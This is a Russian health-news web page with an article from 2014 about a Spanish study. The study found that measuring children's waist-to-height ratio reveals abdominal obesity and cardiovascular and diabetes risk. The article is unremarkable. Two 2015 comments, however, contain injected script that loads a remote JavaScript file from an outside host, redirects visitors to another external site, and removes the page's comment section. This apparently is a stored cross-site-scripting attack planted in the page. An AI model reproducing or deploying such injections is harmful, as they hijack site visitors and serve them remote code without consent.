Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Измерьте талию своему реб...  >>  Измерьте талию своему ребенку и спасите его от инфаркта
 
Обратная связь
 

Измерьте талию своему ребенку и спасите его от инфаркта

Размер шрифта
17 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Новое исследование ученых из Барселоны (Испания) свидетельствует о том, что измерение окружности талии позволяет выявить детей с сердечно-сосудистыми и метаболическими рисками.

Измерьте талию своему ребенку и спасите его от инфаркта

В частности,  это простое действие позволяет с высокой долей вероятности констатировать, повышен ли у конкретного ребенка риск развития атеросклероза и сахарного диабета 2 типа – двух болезней, которых по праву можно назвать основными палачами человечества.

Исследователи проанализировали данные касательно 1 521 испанских детей и подростков в возрасте от шести до семнадцати лет, которые принимали участие в одном из крупных эпидемиологических исследований. Последнее было посвящено изучению различных аспектов детского ожирения.

Авторы измеряли охват талии детей и их рост, а затем рассчитывали отношение этих величин. Этот показатель абсолютно не зависит от возраста и пола; если он равен или превышает 0,5 – значит, у человека имеется абдоминальное (брюшное) ожирение.

«В Испании каждый пятый ребенок (6-11 лет) и каждый седьмой подросток (12-17 лет) имеет те или иные признаки абдоминального ожирения. При этом существует четкая зависимость от массы тела: лишь у 7,5% детей с нормальным весом есть избытки внутрибрюшного жира, тогда как при наличии лишнего веса это число возрастает до 49,2%», – рассказывает Хэльмут Шредер, один из координаторов исследования. «При всем при этом зафиксировать наличие такого ожирения у ребенка с помощью традиционных скрининговых методов – практически невозможно. То же самое справедливо и для подростков».

Таким образом, жир жиру – рознь. У человека может быть повышенная масса тела, но низкие кардиологические риски – в том случае, если жировая ткань у него распределена по телу равномерно. И, напротив, у гипотетической худышки с избытками внутрибрюшного жира в будущем почти наверняка будут проблемы с сосудами и сердцем. Испанским же ученым удалось выяснить принципиальный момент – все это в равной степени справедливо и для ребенка.

За последние годы детское ожирение стало настоящей эпидемией современности. Авторы надеются, что результаты их труда не пропадут даром, и измерение окружности талии станет обязательным компонентом детского медицинского осмотра. Это, в свою очередь, позволит выявлять носителей кардиологического риска уже в самом раннем детстве.

Другие статьи о лишнем весе и о том, как от него избавиться, читайте на страницах нашего специального проекта «Сбрось лишнее».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.